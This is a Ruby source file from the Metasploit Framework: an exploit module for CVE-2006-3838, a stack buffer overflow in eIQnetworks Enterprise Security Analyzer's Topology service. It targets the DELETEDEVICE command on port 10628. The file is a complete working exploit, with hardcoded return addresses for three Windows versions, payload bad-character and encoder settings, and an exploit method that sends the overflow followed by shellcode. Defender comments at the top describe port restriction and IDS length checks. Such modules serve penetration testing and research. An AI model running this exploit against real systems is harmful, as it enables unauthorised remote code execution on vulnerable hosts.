Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2006-3838: a stack buffer overflow in the Topology
# server of eIQnetworks Enterprise Security Analyzer (ESA), reached through an
# over-long argument to the DELETEDEVICE command.
#
# Notes for defenders reading this module:
# * The service is addressed on TCP port 10628 by default (see
#   +register_options+). Limiting that port to management hosts removes the
#   network path used here.
# * The request this module sends starts with the literal +DELETEDEVICE&+ and
#   carries an argument longer than 128 bytes in a single write. A length check
#   on DELETEDEVICE arguments at an IDS or proxy catches that shape without
#   depending on the payload bytes.
# * The description states that only ESA v2.1.13 was tested. Other versions
#   should be checked against the advisories listed under 'References' rather
#   than assumed safe.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, references, payload constraints and
  # per-OS targets) and the default remote port.
  #
  # @param info [Hash] metadata overrides merged by +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in eIQnetworks
        Enterprise Security Analyzer. During the processing of
        long arguments to the DELETEDEVICE command in the Topology
        server, a stack-based buffer overflow occurs.

        This module has only been tested against ESA v2.1.13.
      },
      'Author'         => 'MC',
      'References'     => [
        %w[CVE 2006-3838],
        %w[OSVDB 27528],
        %w[BID 19164]
      ],
      'DefaultOptions' => { 'EXITFUNC' => 'seh' },
      'Payload'        => {
        'Space'          => 250,
        # Bytes kept out of the encoded payload: NUL, LF, CR and space.
        'BadChars'       => "\x00\x0a\x0d\x20",
        'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
      },
      'Platform'       => 'win',
      # Each target pins an address for one OS / service-pack combination, so
      # the module is tied to these exact builds.
      'Targets'        => [
        ['Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 }],
        ['Windows XP SP2 English', { 'Ret' => 0x77d57447 }],
        ['Windows 2003 SP1 English', { 'Ret' => 0x773b24da }]
      ],
      'Privileged'     => false,
      'DisclosureDate' => '2006-07-25'
    ))

    register_options([Opt::RPORT(10628)])
  end

  # Connects to the Topology service, sends one DELETEDEVICE request built from
  # the selected target's settings, starts the payload handler and disconnects.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # 128 random alphanumeric bytes, the target's 'Ret' value packed as a
    # little-endian 32-bit word, then 20 NOP bytes.
    overflow = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)

    # The command keyword plus '&' is the fixed prefix of the request.
    request = "DELETEDEVICE&" + overflow + payload.encoded

    sock.put(request)

    handler
    disconnect
  end
end